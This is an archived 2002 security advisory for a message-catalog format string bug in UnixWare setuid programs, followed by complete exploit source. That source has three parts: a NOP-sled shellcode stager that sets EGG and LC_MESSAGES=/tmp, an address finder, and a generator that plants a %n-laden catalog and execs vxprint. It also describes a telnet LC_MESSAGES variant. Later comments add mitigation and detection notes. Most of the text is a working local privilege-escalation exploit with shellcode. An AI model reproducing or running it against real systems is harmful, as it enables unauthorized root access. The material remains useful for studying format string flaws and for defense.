Unixware Message catalog exploit code

2002-02-12T00:00:00
ID SECURITYVULNS:DOC:2479
Type securityvulns
Reporter Securityvulns
Modified 2002-02-12T00:00:00

Description

Hi, I'm jGgM.

I reported this problem to Caldera a few weeks ago.

This issue has already been fixed.

An attacker can modify the message catalog, which makes a format string exploit possible.

for example)

$ gcc -o expshell expshell.c

$ gcc -o getret getret.c

$ gcc -o fmt_exp fmt_exp.c

$ ./expshell

$ ./getret

e=8047af7

$ ./fmt_exp 0x8047af7 16 (16 is the offset)

...........(wait 30 minutes ). ......

id

uid=0(root) gid=3(sys) ......................

This affects all UnixWare 7 setuid/setgid commands.

telnetd and login can also be exploited.

example)

$ telnet

telnet> env def LC_MESSAGES /tmp

telnet> o localhost

Trying....

.....

login: blah blah..

password: blah.. blash..

...... (wait 30 minutes.. )


Korean security forum

http://www.forsecure.com

http://www.netemperor.com


Here is the code.

------------------ expshell.c ------------------

include <stdio.h>

/*
 * Payload that main() places in the environment: a long run of 0x90 (NOP)
 * bytes followed by a short x86 routine (disassembly in the trailing
 * comments) that ends with the string "/bin/ksh". This program never
 * executes it; it is only data here and is carried into child processes
 * through the environment.
 *
 * Detection note: an environment variable whose value is a long run of
 * 0x90 bytes followed by machine code is a well-known host-based indicator
 * for this class of payload.
 */
char shellcode[]=

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&#92;x90&quot;

&quot;&#92;xeb&#92;x1a&quot;             /* jmp     &lt;shellcode+28&gt;         */

&quot;&#92;x33&#92;xd2&quot;             /* xorl    &#37;edx,&#37;edx              */

&quot;&#92;x58&quot;                 /* popl    &#37;eax                   */

&quot;&#92;x8d&#92;x78&#92;x14&quot;         /* leal    0x14&#40;&#37;eax&#41;,&#37;edi        */

&quot;&#92;x57&quot;                 /* pushl   &#37;edi                   */

&quot;&#92;x50&quot;                 /* pushl   &#37;eax                   */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;x92&quot;                 /* xchgl   &#37;eax,&#37;edx              */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;x88&#92;x42&#92;x08&quot;         /* movb    &#37;al,0x8&#40;&#37;edx&#41;

*/

&quot;&#92;x83&#92;xef&#92;x3b&quot;         /* subl    $0x3b,&#37;edi             */

&quot;&#92;xb0&#92;x9a&quot;             /* movb    $0x9a,&#37;al              */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;x47&quot;                 /* incl    &#37;edi                   */

&quot;&#92;xb0&#92;x07&quot;             /* movb    $0x07,&#37;al              */

&quot;&#92;xab&quot;                 /* stosl   &#37;eax,&#37;es:&#40;&#37;edi&#41;        */

&quot;&#92;xb0&#92;x0b&quot;             /* movb    $0x0b,&#37;al              */

&quot;&#92;xe8&#92;xe1&#92;xff&#92;xff&#92;xff&quot; /* call    &lt;shellcode+2&gt;          */

&quot;/bin/ksh&quot;

;

/*
 * Stages the environment and drops into a shell.
 *
 * Two variables are exported: EGG (the payload bytes above) and
 * LC_MESSAGES=/tmp, the directory from which the advisory says the
 * affected setuid/setgid programs load their message catalog. tcsh is
 * then started with system(), so every program launched from that shell
 * inherits both. This program has no privilege of its own; the risk is
 * entirely in privileged programs that trust an inherited LC_MESSAGES
 * path. Mitigation on the program side is to ignore or sanitize
 * locale-derived catalog paths when running setuid/setgid.
 *
 * Return type is omitted (implicit int); argc/argv are unused.
 */
main(int argc, char *argv[])

{

/* sprintf is unbounded, but the fixed-size shellcode array fits in 1024. */
char buff[1024];

sprintf(buff, "EGG=%s", shellcode);

/* buff stays alive for the rest of main, as putenv keeps the pointer. */
putenv(buff);

putenv("LC_MESSAGES=/tmp");

/* Blocks until the interactive shell exits; its exit status is ignored. */
system("/usr/bin/tcsh");

}


---------------- getret.c --------------------

/*
 * Prints, with %p, the address at which the value of EGG sits in this
 * process's environment (NULL if EGG is not set). The number is only
 * meaningful for another process with the same environment layout, which
 * is why the advisory runs it from the shell started by expshell.
 *
 * Return type is omitted (implicit int); no headers are included, so
 * getenv and printf are implicitly declared.
 */
main()

{

char *a;

a = getenv("EGG");

printf ("e=%p\n", a);

}


---------------- fmt_exp.c -----------------------------

include <stdio.h>

include "shellcode.h"

/* This is the base of the format string return address */

/* Base address of vxprint is 0x20c7c (134268) */

define BASE 134268

/*
 * Builds a message catalog whose every entry is a printf format string,
 * installs it under /tmp/LC_MESSAGES as vxvm.mesg, and then runs vxprint
 * so that (with LC_MESSAGES=/tmp inherited from expshell) it loads that
 * catalog.
 *
 * Defender's reading: the root cause is on the privileged program's side.
 * It resolves its catalog through an environment-controlled directory and
 * then, per the advisory, passes catalog text to a printf-style function
 * as the format, which is what lets the "%n" written below take effect.
 * Mitigation: a setuid/setgid program should ignore or sanitize
 * locale-derived catalog paths, and catalog text should never be used as
 * a format argument (emit it with "%s", or validate that its conversion
 * specifications match the ones the program expects).
 *
 * argv[1]: return address as a hex string (required).
 * argv[2]: optional decimal offset added to the computed value.
 * Exits with status 1 on bad usage or if "testdef" cannot be created.
 * Return type is omitted (implicit int); exit, atol, strtol, system,
 * mkdir and execl are used without prototypes.
 */
main(int argc, char *argv[])

{

FILE *fp;

char *retaddr;

long g_len, offset;

/* line: number of catalog entries written; n: "%10x" repeats per entry. */
int count, count2, line=700, n=19;

if(argc < 2 || argc > 3) {

  printf&#40;&quot;Usage: &#37;s ret-address offset&#92;n&quot;, argv[0]&#41;;

  exit&#40;1&#41;;

}

retaddr = argv[1];

if(argc == 3) offset = atol(argv[2]);

else offset = 0;

/* No error check on strtol: a non-hex argv[1] silently yields 0. */
g_len = strtol(retaddr, NULL, 16);

/* g_len becomes the field width of the final "%x", i.e. the byte count
 * that "%n" will store. */
g_len -= BASE;

g_len += offset;

/* "w+" opens read/write although the file is only written. */
fp = fopen("testdef", "w+");

if(fp == NULL) {

  fprintf&#40;stderr, &quot;can not open file.&#92;n&quot;&#41;; exit&#40;1&#41;;

}

/* Each of the 700 entries is n copies of "%10x" followed by "%<g_len>x%n".
 * The doubled '%' in the format strings is what writes a literal '%'. */
for(count=0; count<line; count++) {

  for&#40;count2=0; count2&lt;n; count2++&#41;

     fprintf&#40;fp, &quot;&#37;&#37;10x&quot;&#41;;

  /* g_len is a long but is printed with "%d"; same width on the 32-bit
   * target, undefined in general. */
  fprintf&#40;fp, &quot;&#37;&#37;&#37;dx&#37;&#37;n&#92;n&quot;, g_len&#41;;

}

fclose(fp);

/* Compiles the catalog with the system's mkmsgs; the stale "testout" is
 * removed first and neither system() result is checked. */
remove("testout");

system("mkmsgs testdef testout");

/* Return value of mkdir is ignored (the directory may already exist). */
mkdir("/tmp/LC_MESSAGES", 0755);

/* NOTE(review): this string literal is shown wrapped across two lines in
 * the archive copy; as printed it is not valid C. */
system("mv

testout /tmp/LC_MESSAGES/vxvm.mesg");

/* Same long-vs-%x mismatch as above. */
printf("ret addr = 0x%x\n", g_len);

/* The original author notes that any setuid command could be used here;
 * vxprint is the one whose catalog (vxvm.mesg) was generated above. */
execl("/usr/sbin/vxprint", "vxprint", "---", NULL);

}